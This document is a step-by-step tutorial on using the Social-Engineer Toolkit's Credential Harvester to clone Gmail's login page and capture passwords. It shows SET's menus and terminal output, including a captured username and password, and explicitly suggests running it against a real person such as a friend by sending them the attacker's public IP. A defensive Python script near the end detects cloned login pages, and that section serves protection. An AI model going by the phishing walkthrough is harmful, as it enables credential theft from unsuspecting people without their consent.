Social Engineering Toolkit
The Social-Engineer Toolkit (SET) is the most powerful tool for performing social engineering attacks; in a way it is the Metasploit of social engineering. It provides a very easy user interface for attacks such as phishing and browser exploitation. In this tutorial we are going to see how it can be used to perform a phishing attack that tries to hack someone's Gmail password.
Credential Harvester Attack
The Credential Harvester attack is one of the options available inside SET. It creates a phishing page, starts a web server to serve it, and captures any login data the user submits. Let's run it and see how it works.
Start SET in a terminal. It should come up with its welcome screen.
    (SET ASCII-art logo)

    [---] The Social-Engineer Toolkit (SET) [---]
    [---] Created by: David Kennedy (ReL1K) [---]
    [---] Development Team: JR DePre (pr1me) [---]
    [---] Development Team: Joey Furr (j0fer) [---]
    [---] Development Team: Thomas Werth [---]
    [---] Development Team: Garland [---]
    [---] Version: 3.6 [---]
    [---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
    [---] Report bugs: [email protected] [---]
    [---] Follow me on Twitter: dave_rel1k [---]
    [---] Homepage: https://www.trustedsec.com [---]

    Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs..

    Join us on irc.freenode.net in channel #setoolkit

    The Social-Engineer Toolkit is a product of TrustedSec.

    Visit: https://www.trustedsec.com

    Select from the menu:

    1) Social-Engineering Attacks
    2) Fast-Track Penetration Testing
    3) Third Party Modules
    4) Update the Metasploit Framework
    5) Update the Social-Engineer Toolkit
    6) Update SET configuration
    7) Help, Credits, and About

    99) Exit the Social-Engineer Toolkit

    set>
For this particular attack we need to select "Social-Engineering Attacks" from the main menu. Type 1 and press Enter. SET will present another menu that looks like this:
    Select from the menu:

    1) Spear-Phishing Attack Vectors
    2) Website Attack Vectors
    3) Infectious Media Generator
    4) Create a Payload and Listener
    5) Mass Mailer Attack
    6) Arduino-Based Attack Vector
    7) SMS Spoofing Attack Vector
    8) Wireless Access Point Attack Vector
    9) QRCode Generator Attack Vector
    10) Powershell Attack Vectors
    11) Third Party Modules

    99) Return back to the main menu.
Here we can choose from various kinds of social engineering attacks. For our purpose select option 2, "Website Attack Vectors". Another menu appears:
    1) Java Applet Attack Method
    2) Metasploit Browser Exploit Method
    3) Credential Harvester Attack Method
    4) Tabnabbing Attack Method
    5) Man Left in the Middle Attack Method
    6) Web Jacking Attack Method
    7) Multi-Attack Web Method
    8) Victim Web Profiler
    9) Create or import a CodeSigning Certificate

    99) Return to Main Menu
This time the menu also comes with a short explanation of each attack. As you can see, the Credential Harvester Attack Method is number 3, which is the one we are going to use. It is explained as
So select number 3 and proceed. It will present another menu:
    1) Web Templates
    2) Site Cloner
    3) Custom Import

    99) Return to Webattack Menu
Here we are going to clone gmail.com to construct our phishing page, so select option 2 (Site Cloner).
    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.7
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:http://www.gmail.com

    The best way to use this attack is if username and password form fields are
    available. Regardless, this captures all POSTs on a website.

    [!] I have read the above message.

    Press <return> to continue

    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
On selecting option 2, SET asks for two important pieces of information: the IP address to which the cloned page will submit the captured data, and the URL to clone, which in this case is gmail.com.
Enter the details and press Return when prompted. The credential harvester now starts a web server on port 80 that serves the cloned gmail.com page. Open the IP address of the SET machine in a browser, either from another machine or from localhost. For example, if SET is running on the machine with IP address 192.168.1.10, open "http://192.168.1.10" in a browser on another machine, or give that address to someone else on the network :)
Now, when a username and password are entered and submitted, SET captures the data and displays it on the terminal. After capturing the data, SET redirects the user to the actual site, that is gmail.com.
    192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 -
    192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
    192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
    [*] WE GOT A HIT! Printing the output:
    PARAM: continue=http://mail.google.com/mail/
    PARAM: service=mail
    PARAM: rm=false
    PARAM: dsh=-2825129499091793842
    PARAM: ltmpl=default
    PARAM: scc=1
    PARAM: GALX=W37Icb1p3hI
    PARAM: pstMsg=1
    PARAM: dnConn=
    PARAM: checkConnection=
    PARAM: checkedDomains=youtube
    PARAM: timeStmp=
    PARAM: secTok=
    PARAM: _utf8=?
    PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE
    POSSIBLE USERNAME FIELD FOUND: Email=ghj
    POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj
    PARAM: signIn=Sign+in
    PARAM: PersistentCookie=yes
    PARAM: rmShown=1
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
See the fields Email and Passwd: they contain the details typed by the user. If you want to carry out this hack on a real user, such as a friend, you have to give them a link that they can open from their own computer to reach the SET clone of Gmail.
If SET is running on your local machine, you have to give the victim your public IP address. They open the link and get the Gmail login page; the rest of the task is to persuade them to log in through that page. If you succeed, you get the login details. The credential harvester attack is not limited to stealing login data: it can capture any generic form submission.
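The cloned page that the harvester serves leaves tells that a user, a browser extension or a mail-gateway URL check can look for: it is served over plain HTTP from a bare IP address (192.168.1.10 above), its password form posts back to the harvester address rather than to the brand's own site, and its links and stylesheets still point at the real google.com hosts. The following Python script is an added example written for this page, not part of SET or of the original post; it checks those tells in a page's HTML using only the standard library. The two HTML pages and the 192.168.1.x addresses in it are constructed samples modelled on the tutorial's output, and the finding codes are names chosen here, not anything SET emits.

```python
"""Heuristic checks for a cloned login page (added example, not SET code)."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _LoginPageParser(HTMLParser):
    """Collects every form (and whether it holds a password field) plus every
    host the page references through href/src/action attributes."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.referenced_hosts = set()
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["has_password"] = True
        for attr in ("href", "src", "action"):
            host = urlparse(a.get(attr) or "").hostname
            if host:
                self.referenced_hosts.add(host.lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _site_of(host):
    """Rough registrable-domain approximation: last two labels, or the IP itself."""
    return host if _is_ip_literal(host) else ".".join(host.split(".")[-2:])


def assess_login_page(page_url, html):
    """Return (code, detail) findings suggesting that `html`, fetched from
    `page_url`, is a cloned login page rather than the brand's own site."""
    page = urlparse(page_url)
    page_host = (page.hostname or "").lower()
    findings = []

    if page.scheme != "https":
        findings.append(("PLAIN_HTTP",
                         "page is not served over HTTPS; a submitted password travels in the clear"))
    if _is_ip_literal(page_host):
        findings.append(("IP_LITERAL_HOST",
                         f"page is served from the bare address {page_host} instead of a domain name"))

    parser = _LoginPageParser()
    parser.feed(html)

    # A password form whose action resolves to a different host than the page
    # itself is the harvester's "POST back" address from the tutorial.
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target_host = (urlparse(urljoin(page_url, form["action"])).hostname or "").lower()
        if target_host != page_host:
            findings.append(("CROSS_HOST_PASSWORD_POST",
                             f"password form posts to {target_host}, not to the page host {page_host}"))

    # A clone keeps the brand's absolute links and assets, so the referenced
    # sites betray which site the page is impersonating.
    brand_sites = {_site_of(h) for h in parser.referenced_hosts
                   if h != page_host and not _is_ip_literal(h)}
    if brand_sites and _site_of(page_host) not in brand_sites:
        findings.append(("BRAND_HOST_MISMATCH",
                         f"page loads from {', '.join(sorted(brand_sites))} but is served by {page_host}"))
    return findings


# Constructed sample: a clone served from the SET machine, posting back to the
# harvester address, with the brand's own links and stylesheet left in place.
CLONED_PAGE_URL = "http://192.168.1.10/"
CLONED_PAGE_HTML = """<html><head><title>Gmail: Email from Google</title>
<link rel="stylesheet" href="https://ssl.gstatic.com/accounts/ui/wp_main.css"></head>
<body><form id="gaia_loginform" action="http://192.168.1.7/" method="post">
<input type="hidden" name="continue" value="http://mail.google.com/mail/">
<input type="text" name="Email"><input type="password" name="Passwd">
<input type="submit" name="signIn" value="Sign in"></form>
<a href="https://accounts.google.com/ForgotPasswd">Can't access your account?</a>
</body></html>"""

# Constructed sample: the genuine login page, served from the brand's own host.
GENUINE_PAGE_URL = "https://accounts.google.com/ServiceLogin"
GENUINE_PAGE_HTML = """<html><head><title>Sign in - Google Accounts</title>
<link rel="stylesheet" href="https://ssl.gstatic.com/accounts/ui/wp_main.css"></head>
<body><form action="/ServiceLoginAuth" method="post">
<input type="text" name="Email"><input type="password" name="Passwd"></form>
<a href="https://www.google.com/accounts/recovery">Can't access your account?</a>
</body></html>"""

if __name__ == "__main__":
    for url, html in ((CLONED_PAGE_URL, CLONED_PAGE_HTML), (GENUINE_PAGE_URL, GENUINE_PAGE_HTML)):
        print(url)
        for code, detail in assess_login_page(url, html) or [("OK", "no clone indicators found")]:
            print(f"  {code}: {detail}")
```

Run stand-alone, the script reports four findings for the constructed clone and none for the genuine page. The checks are deliberately cheap heuristics rather than proof: a clone hosted on a lookalike domain behind HTTPS would pass the first two, which is why the form-target and brand-mismatch checks matter, and why nothing here replaces checking the address bar before typing a password.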
Phishing attacks are very common in the form of spam emails. Attackers set up phishing pages on web hosts and spread the links to users over email. The phishing pages range from simple email sites to bank logins and more.